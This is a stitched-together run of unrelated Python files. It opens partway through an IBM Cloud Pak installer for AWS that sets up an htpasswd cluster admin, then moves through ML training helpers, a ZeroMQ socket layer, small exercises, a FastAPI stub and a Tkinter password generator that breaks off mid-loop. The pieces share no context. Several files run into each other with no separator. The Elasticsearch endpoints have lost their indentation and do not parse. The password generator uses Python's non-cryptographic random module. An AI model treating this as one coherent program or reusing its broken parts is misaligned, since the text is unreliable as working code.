    # Install the patched registries.conf on the boot node as well.
    destDir = "/etc/containers/"
    if (not os.path.exists(destDir)):
        os.makedirs(destDir)
    shutil.copyfile(registries,"/etc/containers/registries.conf")
    create_registry = "oc create -f "+registry_mc
    create_crio_mc = "oc create -f "+crio_mc
    # Replace the default kubeadmin credentials with an htpasswd-backed
    # cluster-admin "admin" user.
    """
    Addd logic to create openshift httpdpasswd and use it instead of default kubeadmin credentials
    """
    TR.info(methodName,"Creating htpasswd for openshift")
    htpasswd_cmd = "htpasswd -c -B -b /tmp/.htpasswd admin "+self.password
    htpass_secret_cmd = "oc create secret generic htpass-secret --from-file=htpasswd=/tmp/.htpasswd -n openshift-config"
    create_OAuth_cmd = "oc apply -f /ibm/installDir/auth-htpasswd.yaml"
    create_oc_policy_cmd = "oc adm policy add-cluster-role-to-user cluster-admin admin"
    TR.info(methodName,"Creating htpasswd for openshift with command")
    try:
        time.sleep(30)
        htpasswd_retcode = check_output(['bash','-c', htpasswd_cmd])
        TR.info(methodName,"Creating OC secret generic with command %s"%htpass_secret_cmd)
        time.sleep(30)
        secret_retcode = check_output(['bash','-c', htpass_secret_cmd])
        TR.info(methodName,"Creating OAuth with command %s"%create_OAuth_cmd)
        oauth_retcode = check_output(['bash','-c', create_OAuth_cmd])
        TR.info(methodName,"Creating OC Adm policy add cluster role to user with command %s"%create_oc_policy_cmd)
        oc_policy_retcode = check_output(['bash','-c', create_oc_policy_cmd])
    except CalledProcessError as e:
        # NOTE(review): if any command above fails, the *_retcode locals used
        # below are unbound and the TR.info lines raise NameError.
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    TR.info(methodName,"Created htpasswd returned %s"%(htpasswd_retcode))
    TR.info(methodName,"Created OC secret with command %s returned %s"%(htpass_secret_cmd,secret_retcode))
    TR.info(methodName,"Created OAuth with command %s returned %s"%(create_OAuth_cmd,oauth_retcode))
    TR.info(methodName,"Created Cluster role to user with command %s returned %s"%(create_oc_policy_cmd,oc_policy_retcode))
    TR.info(methodName,"Created htpasswd for openshift")
    TR.info(methodName,"Creating registry mc with command %s"%create_registry)
    try:
        reg_retcode = check_output(['bash','-c', create_registry])
        TR.info(methodName,"Creating crio mc with command %s"%create_crio_mc)
        crio_retcode = check_output(['bash','-c', create_crio_mc])
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    TR.info(methodName,"Created regsitry with command %s returned %s"%(create_registry,reg_retcode))
    TR.info(methodName,"Created Crio mc with command %s returned %s"%(create_crio_mc,crio_retcode))
    create_cluster_as_cmd = "oc create -f /ibm/templates/cpd/cluster-autoscaler.yaml"
    TR.info(methodName,"Create of Cluster auto scaler")
    try:
        retcode = check_output(['bash','-c', create_cluster_as_cmd])
        TR.info(methodName,"Created Cluster auto scaler %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # Kernel/ulimit machine configs (mirrors the terraform snippet below).
    """
    "oc create -f ${local.ocptemplates}/wkc-sysctl-mc.yaml",
    "oc create -f ${local.ocptemplates}/security-limits-mc.yaml",
    """
    sysctl_cmd = "oc create -f /ibm/templates/cpd/wkc-sysctl-mc.yaml"
    TR.info(methodName,"Create SystemCtl Machine config")
    try:
        retcode = check_output(['bash','-c', sysctl_cmd])
        TR.info(methodName,"Created SystemCtl Machine config %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    secLimits_cmd = "oc create -f /ibm/templates/cpd/security-limits-mc.yaml"
    TR.info(methodName,"Create Security Limits Machine config")
    try:
        retcode = check_output(['bash','-c', secLimits_cmd])
        TR.info(methodName,"Created Security Limits Machine config %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # Give the machine-config rollout time to settle before reading the
    # console route.
    time.sleep(600)
    oc_route_cmd = "oc get route console -n openshift-console | grep 'console' | awk '{print $2}'"
    TR.info(methodName, "Get OC URL")
    try:
        self.openshiftURL = check_output(['bash','-c', oc_route_cmd])
        TR.info(methodName, "OC URL retrieved %s"%self.openshiftURL)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    TR.info(methodName," Completed installation of Openshift Container Platform")
#endDef
def __init(self, stackId, stackName, icpdInstallLogFile):
    """
    Late initializer invoked from main(): create the boto3 clients, load the
    CloudFormation stack parameters into module-level globals, build the log
    exporter and generate the boot node's ssh key pair.

    NOTE(review): the double-underscore name is name-mangled to
    _<ClassName>__init and methodName says "_init" — presumably a deliberate
    private helper, but worth confirming.

    Parameters
    ----------
    stackId : str
        CloudFormation stack id whose parameters are loaded.
    stackName : str
        Stack name, used as the S3 key prefix for exported logs.
    icpdInstallLogFile : file object
        Open install log handle; ssh-keygen output is redirected into it.
    """
    methodName = "_init"
    global StackParameters, StackParameterNames
    # All AWS clients are scoped to the region parsed from the CLI args.
    boto3.setup_default_session(region_name=self.region)
    self.cfnResource = boto3.resource('cloudformation', region_name=self.region)
    self.cf = boto3.client('cloudformation', region_name=self.region)
    self.ec2 = boto3.client('ec2', region_name=self.region)
    self.s3 = boto3.client('s3', region_name=self.region)
    self.iam = boto3.client('iam',region_name=self.region)
    self.secretsmanager = boto3.client('secretsmanager', region_name=self.region)
    self.ssm = boto3.client('ssm', region_name=self.region)
    StackParameters = self.getStackParameters(stackId)
    StackParameterNames = StackParameters.keys()
    TR.info(methodName,"self.stackParameters %s" % StackParameters)
    TR.info(methodName,"self.stackParameterNames %s" % StackParameterNames)
    self.logExporter = LogExporter(region=self.region,
                                   bucket=self.ICPDDeploymentLogsBucketName,
                                   keyPrefix=stackName,
                                   fqdn=socket.getfqdn()
                                   )
    TR.info(methodName,"Create ssh keys")
    # Password-less key pair consumed by install-config.yaml (${sshKey}).
    command = "ssh-keygen -P {} -f /root/.ssh/id_rsa".format("''")
    try:
        # NOTE(review): subprocess.call never raises CalledProcessError, so
        # the handler below is effectively unreachable; check_call would.
        call(command,shell=True,stdout=icpdInstallLogFile)
        TR.info(methodName,"Created ssh keys")
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
def getSecret(self, icpdInstallLogFile):
    """
    Load the CPD admin password and API key from AWS Secrets Manager.

    Reads the secret identified by self.cpdSecret and, when it carries a
    SecretString, stores its 'adminPassword' and 'apikey' fields on
    self.password and self.apiKey. Secret values are deliberately not logged.

    Parameters
    ----------
    icpdInstallLogFile : file object
        Open install log handle (unused; kept for interface symmetry).
    """
    methodName = "getSecret"
    TR.info(methodName,"Start Get secrets %s"%self.cpdSecret)
    response = self.secretsmanager.get_secret_value(SecretId=self.cpdSecret)
    if 'SecretString' in response:
        parsed = json.loads(response['SecretString'])
        self.password = parsed['adminPassword']
        self.apiKey = parsed['apikey']
    TR.info(methodName,"End Get secrets")
#endDef
def updateSecret(self, icpdInstallLogFile):
    """
    Store the generated OpenShift kubeadmin password in the AWS Secrets
    Manager secret identified by self.ocpSecret.

    Parameters
    ----------
    icpdInstallLogFile : file object
        Open install log handle (unused; kept for interface symmetry).
    """
    methodName = "updateSecret"
    TR.info(methodName,"Start updateSecret %s"%self.ocpSecret)
    # Bug fix: the previous string concatenation produced invalid JSON (the
    # password value was unquoted) and broke on passwords containing quotes
    # or backslashes. json.dumps performs correct quoting and escaping.
    secret_update = json.dumps({"ocpPassword": self.ocpassword})
    response = self.secretsmanager.update_secret(SecretId=self.ocpSecret,SecretString=secret_update)
    TR.info(methodName,"Updated secret for %s with response %s"%(self.ocpSecret, response))
    TR.info(methodName,"End updateSecret")
#endDef
#
def exportResults(self, name, parameterValue ,icpdInstallLogFile):
    """
    Publish a single result value to AWS SSM Parameter Store.

    Parameters
    ----------
    name : str
        Parameter name (e.g. "<stack>-OpenshiftURL").
    parameterValue : str
        Value to store; existing parameters are overwritten.
    icpdInstallLogFile : file object
        Open install log handle (unused; kept for interface symmetry).
    """
    methodName = "exportResults"
    TR.info(methodName,"Start export results")
    self.ssm.put_parameter(Name=name, Value=parameterValue, Type='String', Overwrite=True)
    TR.info(methodName,"Value: %s put to: %s." % (parameterValue,name))
#endDef
def main(self,argv):
    """
    Orchestrate the full quickstart installation on the boot node.

    Phases: parse CLI args and configure tracing; read environment-provided
    configuration; initialize AWS clients (__init); fetch secrets; install
    OCP; configure the selected storage backend (OCS/Portworx/EFS); install
    CPD; export result URLs; and finally export logs to S3 and signal
    CloudFormation success/failure via cfn-signal.

    Parameters
    ----------
    argv : list of str
        Process argument vector (argv[0] is skipped).
    """
    methodName = "main"
    self.rc = 0
    try:
        beginTime = Utilities.currentTimeMillis()
        cmdLineArgs = Utilities.getInputArgs(self.ArgsSignature,argv[1:])
        trace, logFile = self._configureTraceAndLogging(cmdLineArgs)
        self.region = cmdLineArgs.get('region')
        if (logFile):
            TR.appendTraceLog(logFile)
        if (trace):
            TR.info(methodName,"Tracing with specification: '%s' to log file: '%s'" % (trace,logFile))
        logFilePath = os.path.join(self.logsHome,"icpd_install.log")
        with open(logFilePath,"a+") as icpdInstallLogFile:
            self.stackId = cmdLineArgs.get('stackid')
            self.stackName = cmdLineArgs.get('stack-name')
            # Deployment configuration is injected through environment
            # variables set by the CloudFormation launch template.
            self.amiID = environ.get('AMI_ID')
            self.cpdSecret = environ.get('CPD_SECRET')
            self.ocpSecret = environ.get('OCP_SECRET')
            self.cpdbucketName = environ.get('ICPDArchiveBucket')
            self.ICPDInstallationCompletedURL = environ.get('ICPDInstallationCompletedURL')
            TR.info(methodName, "amiID %s "% self.amiID)
            TR.info(methodName, "cpdbucketName %s "% self.cpdbucketName)
            TR.info(methodName, "ICPDInstallationCompletedURL %s "% self.ICPDInstallationCompletedURL)
            TR.info(methodName, "cpdSecret %s "% self.cpdSecret)
            TR.info(methodName, "ocpSecret %s "% self.ocpSecret)
            self.__init(self.stackId,self.stackName, icpdInstallLogFile)
            self.zones = Utilities.splitString(self.AvailabilityZones)
            TR.info(methodName," AZ values %s" % self.zones)
            TR.info(methodName,"RedhatPullSecret %s" %self.RedhatPullSecret)
            secret = self.RedhatPullSecret.split('/',1)
            TR.info(methodName,"Pull secret %s" %secret)
            self.pullSecret = "/ibm/pull-secret"
            # Copy the Red Hat pull secret from S3 onto the boot node.
            s3_cp_cmd = "aws s3 cp "+self.RedhatPullSecret+" "+self.pullSecret
            TR.info(methodName,"s3 cp cmd %s"%s3_cp_cmd)
            call(s3_cp_cmd, shell=True,stdout=icpdInstallLogFile)
            self.getSecret(icpdInstallLogFile)
            ocpstart = Utilities.currentTimeMillis()
            self.installOCP(icpdInstallLogFile)
            ocpend = Utilities.currentTimeMillis()
            self.printTime(ocpstart, ocpend, "Installing OCP")
            # Convert the per-service string flags to booleans.
            self.installWKC = Utilities.toBoolean(self.WKC)
            self.installWSL = Utilities.toBoolean(self.WSL)
            self.installDV = Utilities.toBoolean(self.DV)
            self.installWML = Utilities.toBoolean(self.WML)
            self.installOSWML = Utilities.toBoolean(self.OpenScale)
            self.installCDE = Utilities.toBoolean(self.CDE)
            self.installSpark= Utilities.toBoolean(self.Spark)
            # OpenScale requires WML, so force it on.
            if(self.installOSWML):
                self.installWML=True
            storagestart = Utilities.currentTimeMillis()
            # Storage backend selection: OCS, Portworx or EFS.
            if(self.StorageType=='OCS'):
                self.configureOCS(icpdInstallLogFile)
            elif(self.StorageType=='Portworx'):
                TR.info(methodName,"PortworxSpec %s" %self.PortworxSpec)
                spec = self.PortworxSpec.split('/',1)
                TR.info(methodName,"spec %s" %spec)
                self.spec = "/ibm/templates/px/px-spec.yaml"
                # Download the user-provided Portworx spec from S3.
                s3_cp_cmd = "aws s3 cp "+self.PortworxSpec+" "+self.spec
                TR.info(methodName,"s3 cp cmd %s"%s3_cp_cmd)
                call(s3_cp_cmd, shell=True,stdout=icpdInstallLogFile)
                self.configurePx(icpdInstallLogFile)
            elif(self.StorageType=='EFS'):
                self.EFSDNSName = environ.get('EFSDNSName')
                self.EFSID = environ.get('EFSID')
                self.configureEFS()
            storageend = Utilities.currentTimeMillis()
            self.printTime(storagestart, storageend, "Installing storage")
            self.installCPD(icpdInstallLogFile)
            self.updateSecret(icpdInstallLogFile)
            # Publish the resulting console URLs to SSM Parameter Store.
            self.exportResults(self.stackName+"-OpenshiftURL", "https://"+self.openshiftURL, icpdInstallLogFile)
            self.exportResults(self.stackName+"-CPDURL", "https://"+self.cpdURL, icpdInstallLogFile)
        #endWith
    except Exception as e:
        TR.error(methodName,"Exception with message %s" %e)
        self.rc = 1
    finally:
        try:
            # Copy icpHome/logs to the S3 bucket for logs.
            self.logExporter.exportLogs("/var/log/")
            self.logExporter.exportLogs("/ibm/cpd-cli-workspace/Logs")
            self.logExporter.exportLogs("%s" % self.logsHome)
        except Exception as e:
            TR.error(methodName,"ERROR: %s" % e, e)
            self.rc = 1
        #endTry
        endTime = Utilities.currentTimeMillis()
        elapsedTime = (endTime - beginTime)/1000
        etm, ets = divmod(elapsedTime,60)
        eth, etm = divmod(etm,60)
        if (self.rc == 0):
            success = 'true'
            status = 'SUCCESS'
            TR.info(methodName,"SUCCESS END CPD Install AWS ICPD Quickstart. Elapsed time (hh:mm:ss): %d:%02d:%02d" % (eth,etm,ets))
            self.updateStatus(status)
        else:
            success = 'false'
            status = 'FAILURE: Check logs in S3 log bucket or on the Boot node EC2 instance in /ibm/logs/icpd_install.log and /ibm/logs/post_install.log'
            TR.info(methodName,"FAILED END CPD Install AWS ICPD Quickstart. Elapsed time (hh:mm:ss): %d:%02d:%02d" % (eth,etm,ets))
            self.updateStatus(status)
        #endIf
        # Tell CloudFormation whether the installation succeeded.
        try:
            data = "%s: IBM Cloud Pak installation elapsed time: %d:%02d:%02d" % (status,eth,etm,ets)
            check_call(['cfn-signal',
                        '--success', success,
                        '--id', self.stackId,
                        '--reason', status,
                        '--data', data,
                        self.ICPDInstallationCompletedURL
                        ])
        except CalledProcessError as e:
            TR.error(methodName, "ERROR return code: %s, Exception: %s" % (e.returncode, e), e)
            raise e
#end Def
#endClass

if __name__ == '__main__':
    # Script entry point: build the installer and run it with the CLI args.
    mainInstance = CPDInstall()
    mainInstance.main(sys.argv)
#endIf
class MyClass:
    """Demo class that announces its construction and destruction on stdout."""

    def __init__(self, n):
        self.n = n
        message = "__init__(%d) called" % self.n
        print(message)

    def __del__(self):
        # Fires when the last reference is dropped (immediately under
        # CPython's reference counting).
        message = "__del__(%d) called" % self.n
        print(message)
# Three long-lived instances; 1 and 3 are replaced mid-loop below.
a1 = MyClass(1)
a2 = MyClass(2)
a3 = MyClass(3)

# l = []
# for i in range(10,21):
#     l.append(MyClass(i))

# Rebinding x each iteration drops the previous instance's last reference,
# so (in CPython, which uses reference counting) __del__ runs immediately.
# At i == 15 and again at i == 17, a1/a3 are explicitly deleted and replaced
# with fresh instances, interleaving their __del__/__init__ prints with x's.
for i in range(10,21):
    x = MyClass(i)
    if (i == 15) or (i == 17):
        del a1
        del a3
        a3 = MyClass(300+i)
        a1 = MyClass(100+i)
|
#import sys
#input = sys.stdin.readline
def main():
    """Read N and K from stdin; print N's distance to the nearest multiple of K."""
    n, k = (int(token) for token in input().split())
    remainder = n % k
    # Either reduce N by `remainder` or raise it by `k - remainder`;
    # when remainder is 0 this correctly prints 0.
    print(min(remainder, k - remainder))


if __name__ == '__main__':
    main()
|
import argparse
import joblib
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from typing import Text
import yaml
def train(config_path: Text) -> None:
    """Train a classifier on the train split and persist it to disk.

    Args:
        config_path {Text}: path to the YAML config; must provide
            data_split.train_path (CSV with a 'target' column) and
            train.model_path (destination for the pickled model).
    """
    # Bug fix: the config file handle was opened without ever being closed;
    # a context manager releases it deterministically.
    with open(config_path) as config_file:
        config = yaml.safe_load(config_file)

    train_dataset_path = config['data_split']['train_path']
    model_path = config['train']['model_path']

    # Load train set
    train_dataset = pd.read_csv(train_dataset_path)

    # Split features (X) from the target column (y).
    y = train_dataset.loc[:, 'target'].values.astype('float32')
    X = train_dataset.drop('target', axis=1).values

    # Create an instance of classifier and fit the data.
    # clf = LogisticRegression(C=0.001, solver='saga', multi_class='multinomial', max_iter=100)
    clf = SVC(C=0.01, kernel='linear', gamma='scale', degree=5)
    clf.fit(X, y)
    joblib.dump(clf, model_path)
if __name__ == '__main__':
    # CLI entry point: the only argument is the path to the YAML config.
    parser = argparse.ArgumentParser()
    parser.add_argument('--config', dest='config', required=True)
    cli_args = parser.parse_args()
    train(config_path=cli_args.config)
######################################################################################################################################################################
###### A list of functions useful to the tensorflow model. ##########################################################################################
######################################################################################################################################################################
import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
import collections
import random
from scipy import spatial
import io
import sys
from preprocess import load_glove, get_input_data, build_dictionaries, create_embeddings, get_input_labels, get_input_data_per_batch, get_input_labels_per_batch
# Transforms input_data, a list of articles tokenized by word, into a list of articles tokenized by wordID.
def get_input_data_as_ids(word2id, input_data):
    """Map every word of every article to its integer id via word2id.

    Raises KeyError if a word is missing from the vocabulary.
    """
    return np.array([[word2id[word] for word in article] for article in input_data])
# Generator yielding one (padded_article_ids, scores, masks) triple per batch
# read from folder_name.
def get_batch_from_folder(max_article_length, folder_name, batch_size, num_batches, wordToID):
    """
    Yield num_batches batches of (ids, scores, masks).

    ids   : (batch_size, max_article_length) word-id matrix, '<PAD>'-padded.
    scores: (batch_size, 1) labels for the batch.
    masks : (batch_size, max_article_length); 1.0 for real tokens and -100.0
            for padding positions.
    """
    for i in range(num_batches):
        masks = []
        batch_articles = get_input_data_per_batch(batch_size, i * batch_size, folder_name)
        batch_articles_ids = get_input_data_as_ids(wordToID, batch_articles)
        batch_input_scores = get_input_labels_per_batch(batch_size, i * batch_size, folder_name)
        # Pads each article in the batch to max_article_length
        padded_batch_articles_ids = []
        for article_id_list in batch_articles_ids:
            mask = [1.0] * len(article_id_list)
            if len(article_id_list) > max_article_length:
                # Bug fix: truncate the mask together with the ids. Previously
                # only the ids were cut, so over-long articles produced masks
                # longer than max_article_length and misaligned with the
                # padded id matrix.
                article_id_list = article_id_list[:max_article_length]
                mask = mask[:max_article_length]
            while len(article_id_list) < max_article_length:
                article_id_list.append(wordToID['<PAD>'])
                mask.append(-100.0)
            padded_batch_articles_ids.append(article_id_list)
            masks.append(mask)
        yield np.asarray(padded_batch_articles_ids), np.expand_dims(np.asarray(batch_input_scores), axis=1), np.asarray(masks)
# Runs the model over the whole dev set, accumulating cost and predictions,
# then reports how many articles were scored within 0.1 of their label.
def run_and_eval_dev(sess, max_article_length, folder_name, dev_batch_size, num_dev_batches, wordToID, embeddings, cost, predictions, inputs_placeholder, masks_placeholder, scores_placeholder, embedding_placeholder):
    """
    Evaluate the model on the dev set and return the mean batch cost.

    sess is an open tf.Session; cost/predictions are graph tensors fed via
    the four placeholders. Predictions and labels are collected per batch so
    accuracy-within-threshold can be computed over the entire dev set.
    """
    epoch_cost = 0.0
    batches = get_batch_from_folder(max_article_length, folder_name, dev_batch_size, num_dev_batches, wordToID)
    all_batch_predictions = np.zeros(shape=(dev_batch_size, num_dev_batches, 1), dtype=np.float32)
    all_batch_labels = np.zeros(shape=(dev_batch_size, num_dev_batches, 1), dtype=np.float32)
    for batch in range(num_dev_batches):
        # Python 2 generator protocol (.next()).
        padded_batch_articles_ids, batch_labels, batch_masks = batches.next()
        all_batch_labels[:, batch] = batch_labels
        batch_cost, batch_predictions = sess.run([cost, predictions], feed_dict={inputs_placeholder: padded_batch_articles_ids, masks_placeholder: batch_masks, scores_placeholder: batch_labels, embedding_placeholder: embeddings})
        all_batch_predictions[:, batch] = batch_predictions
        # Average the cost across batches while summing.
        epoch_cost += batch_cost / num_dev_batches
    #Evaluate entire dev set
    # A prediction counts as correct when within similarity_threshold of its label.
    similarity_threshold = 0.1
    correctly_scored_count = 0
    score_differences = abs(all_batch_labels - all_batch_predictions)
    correctly_scored_count = np.sum(score_differences < similarity_threshold)
    # NOTE(review): tf.divide builds a graph tensor, so the print below shows
    # an unevaluated Tensor object, not a number; plain float division (or a
    # sess.run) would log the actual performance value.
    performance = tf.divide(correctly_scored_count, num_dev_batches*dev_batch_size)
    print "Test correctly scored count: " + str(correctly_scored_count)
    sys.stdout.flush()
    print "Test performance: " + str(performance)
    sys.stdout.flush()
    return epoch_cost
# Creates & Returns the tensorflow graph's placeholders
def create_placeholders(max_article_length, batch_size, vocab_size, embedding_dim):
    """Build and return the graph's four feed placeholders as a tuple:
    (inputs, masks, scores, embedding)."""
    inputs = tf.placeholder(tf.int32, shape=[batch_size, max_article_length], name="inputs_placeholder")
    masks = tf.placeholder(tf.float32, shape=[batch_size, max_article_length], name="masks_placeholder")
    # Scores have a dynamic batch dimension.
    scores = tf.placeholder(tf.float32, shape=[None, 1], name="scores_placeholder")
    embedding = tf.placeholder(tf.float32, shape=[vocab_size, embedding_dim], name="embedding_placeholder")
    return inputs, masks, scores, embedding
# Returns the mean squared error cost
def get_cost(predictions, true_labels):
    """Mean squared error between predictions and true_labels (a tensor)."""
    squared_errors = tf.square(tf.subtract(predictions, true_labels))
    return tf.reduce_mean(squared_errors)
|
'''Question 9
Level 2
Question:
Write a program that accepts sequence of lines as input and prints the lines after making all characters in the sentence capitalized.
Suppose the following input is supplied to the program:
Hello world
Practice makes perfect
Then, the output should be:
HELLO WORLD
PRACTICE MAKES PERFECT
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input.'''
lines = []
# Collect input lines, uppercased, until a blank line ends the sequence.
while True:
    sentence = input("Please enter sentence here: ")
    if not sentence:
        break
    lines.append(sentence.upper())

for line in lines:
    print(line)
|
from .abstractmodel import AbstractClassificationModel
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# Abstract focal model
class AbstractFocalModel(AbstractClassificationModel):
    """Classification model variant that trains with focal loss."""

    def compile_model(self, net):
        """Return an (optimizer, criterion) pair for net: SGD with momentum
        and weight decay, plus a GPU-resident FocalLoss criterion."""
        print("Learning rate is set to ", self.learning_rate)
        criterion = FocalLoss(self.focal_gamma).cuda(0)
        optimizer = optim.SGD(net.parameters(), lr=self.learning_rate, momentum=0.9, weight_decay=5e-4)
        return optimizer, criterion
class FocalLoss(nn.Module):
    """Multi-class focal loss: -alpha * (1 - p_t)**gamma * log(p_t).

    Down-weights well-classified examples so training focuses on hard ones.
    """

    def __init__(self, focal_gamma_arg, alpha=0.25):
        # Generalized: alpha was previously hard-coded to 0.25 inside
        # forward(); it is now a keyword argument with the same default, so
        # existing callers are unaffected.
        self.focal_gamma = focal_gamma_arg
        self.alpha = alpha
        super(FocalLoss, self).__init__()

    def forward(self, y_pred, y):
        # y_pred: (N, C) raw logits; y: (N,) integer class labels.
        epsilon = 1e-7  # numerical floor to keep log() finite
        y_pred = F.softmax(y_pred, dim=1)
        # Probability assigned to the true class of each sample.
        y_pred = y_pred[range(y_pred.shape[0]), y] + epsilon
        focal_loss = -self.alpha * torch.pow(1.0 - y_pred, self.focal_gamma) * torch.log(epsilon + y_pred)
        #print("fl:", focal_loss)
        return focal_loss.mean()
|
'''
Created on Dec 18, 2013
@author: anbangx
'''
if __name__ == '__main__':
    # Demonstrates that function names are ordinary variables: after the
    # rebinding below, calling f() executes g's body and prints 1.
    def f():
        return 0

    def g():
        return 1

    f = g
    print(f())
# Copyright 2016 Husky Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zmq
class OperationParam(object):
    """Key names used in operation-parameter dictionaries exchanged with the
    C++ side."""

    data_str = "data"
    url_str = "url"
    lambda_str = "lambda"
    list_str = "list_name"

    def __init__(self):
        pass
class GlobalVar(object):
    """Process-wide registries shared by all operations (used as class-level
    globals, never instantiated)."""
    # Operation type tags.
    actiontype = "action"
    transformationtype = "transformation"
    loadtype = "load"
    librarytype = "library"
    # Mutable class-level registries -- intentionally shared across the process.
    data_chunk = dict()
    name_to_func = dict()
    name_to_type = dict()
    name_to_prefunc = dict()
    name_to_postfunc = dict()
    def __init__(self):
        pass
class GlobalSocket(object):
    """Process-wide ZeroMQ PULL/PUSH pipe pair to the C++ Husky backend.

    Sockets are stored as class attributes (pipe_from_cpp / pipe_to_cpp) set
    by init_socket(), so the class acts as a per-process singleton.
    """
    def __init__(self):
        pass
    # pipe_from_cpp
    # pipe_to_cpp
    @staticmethod
    def init_socket(wid, pid, session_id):
        # NOTE(review): string concatenation assumes wid/pid/session_id are
        # already strings -- confirm against the caller.
        ctx = zmq.Context()
        GlobalSocket.pipe_from_cpp = zmq.Socket(ctx, zmq.PULL)
        GlobalSocket.pipe_from_cpp.bind("ipc://pyhusky-session-"+session_id+"-proc-"+pid+"-"+wid)
        GlobalSocket.pipe_to_cpp = zmq.Socket(ctx, zmq.PUSH)
        GlobalSocket.pipe_to_cpp.connect("ipc://cpphusky-session-"+session_id+"-proc-"+pid+"-"+wid)
    @staticmethod
    def send(content):
        # Forward raw bytes to the C++ side.
        GlobalSocket.pipe_to_cpp.send(content)
    @staticmethod
    def recv():
        # Blocking receive from the C++ side.
        return GlobalSocket.pipe_from_cpp.recv()
class GlobalN2NSocket(object):
    """Node-to-node ZeroMQ mesh: one local PULL socket plus one PUSH socket
    per remote worker (Python 2 code -- note `xrange`)."""
    @staticmethod
    def init_socket():
        ctx = zmq.Context()
        # Base port is negotiated via the C++ pipe; each worker listens on
        # base + its local id. GlobalVar.local_id is set elsewhere -- TODO confirm.
        comm_port = int(GlobalSocket.recv()) + 1
        GlobalN2NSocket.puller = ctx.socket(zmq.PULL)
        GlobalN2NSocket.puller.bind("tcp://0.0.0.0:" + str(comm_port + GlobalVar.local_id))
        GlobalN2NSocket.pushers = []
        # The C++ side sends: host count, then for each host its name and
        # its per-host worker count.
        for _ in xrange(int(GlobalSocket.recv())):
            host = "tcp://" + GlobalSocket.recv() + ":"
            for j in xrange(int(GlobalSocket.recv())):
                sock = ctx.socket(zmq.PUSH)
                sock.connect(host + str(comm_port + j))
                GlobalN2NSocket.pushers.append(sock)
    @staticmethod
    def send(dst, msg):
        # dst indexes into the flat pushers list built in init_socket().
        GlobalN2NSocket.pushers[dst].send(msg)
    @staticmethod
    def recv():
        return GlobalN2NSocket.puller.recv()
#from models import User
from models import User
from fastapi import FastAPI
from starlette.routing import Host
import uvicorn
app = FastAPI()

@app.post('/users/', response_model=User)
def create_user(user: User):
    """Echo back the validated user payload."""
    return user

if __name__ == "__main__":
    # BUG FIX: uvicorn.run() takes a lowercase `host` keyword; passing `Host=`
    # raised a TypeError (it also shadowed the imported starlette Host).
    uvicorn.run(app, host="0.0.0.0", port=8000)
from assignmentelasticsearch.search import app
from assignmentelasticsearch.search.functions import find_most_expensive, find_greenest, find_allweeklong
@app.endpoint("most-expensive")
def mostexpensive():
return {"most expensive 10 product": find_most_expensive()}
@app.endpoint("greenest")
def greenest():
return {"greenest": find_greenest()}
@app.endpoint("all-week-long")
def allweeklong():
return {"all-week-long": find_allweeklong()}
|
from game.items.item import Hatchet
from game.skills import SkillTypes
class RuneHatchet(Hatchet):
    # Item/equipment stats for the rune-tier hatchet.
    name = 'Rune Hatchet'
    value = 12800                                       # base value in coins -- TODO confirm unit
    skill_requirement = {SkillTypes.woodcutting: 41}    # needed to use as a tool
    equip_requirement = {SkillTypes.attack: 50}         # needed to wield as a weapon
    damage = 306
    accuracy = 850
from Tkinter import *
import random
import string
import tkMessageBox
# Build the main window and the static form labels/entries (Python 2 Tkinter).
root=Tk()
root.geometry("300x400")
root.title("Password generator")
Label(root, text="Website: ").grid(row=0, sticky=W)
Label(root, text="Username: ").grid(row=1, sticky=W)
Label(root, text="Password: ").grid(row=2, sticky=W)
Label(root, text="Password Length: ").grid(row=3, sticky=W)
Label(root, text="Allowed Characters: ").grid(row=4, sticky=W)
# Create widgets
website_e = Entry(root, width=30)
username_e = Entry(root, width=30)
password_e = Entry(root, width=30)  # generated password is inserted here by gen()
len_e = Entry(root, width=3)        # requested password length, read by gen()
website_e.grid(row=0, column=1, sticky=W)
username_e.grid(row=1, column=1, sticky=W)
password_e.grid(row=2, column=1, sticky=W)
len_e.grid(row=3, column=1, sticky=W)
def create():
    """Validate the website/username entries and report success or a warning."""
    site = website_e.get()
    user = username_e.get()
    if not site or not user:
        tkMessageBox.showwarning("Warning", "One of your Field is empty")
        return
    tkMessageBox.showinfo("Congo", "Password created succesfully")
def gen():
    """Generate a random password of the requested length from the selected
    character classes and place it in the password entry.

    BUG FIXES: a non-numeric length no longer crashes int(); selecting no
    character class no longer raises IndexError in random.choice. Leftover
    debug prints were removed.
    """
    try:
        length = int(len_e.get())
    except ValueError:
        tkMessageBox.showwarning("Warning", "Password length must be a number")
        return
    if length <= 0:
        tkMessageBox.showwarning("Warning", "Password length must be positive")
        return
    allowed_classes = []
    if allow_uppercase.get() == 1:
        allowed_classes.append(0)
    if allow_lowercase.get() == 1:
        allowed_classes.append(1)
    if allow_numbers.get() == 1:
        allowed_classes.append(2)
    if allow_special.get() == 1:
        allowed_classes.append(3)
    if not allowed_classes:
        tkMessageBox.showwarning("Warning", "Select at least one character class")
        return
    # Index i in allowed_classes selects charclass[i].
    charclass = [string.ascii_uppercase, string.ascii_lowercase, string.digits, '!$%@#']
    pw = ""
    for _ in range(length):
        c = random.choice(allowed_classes)
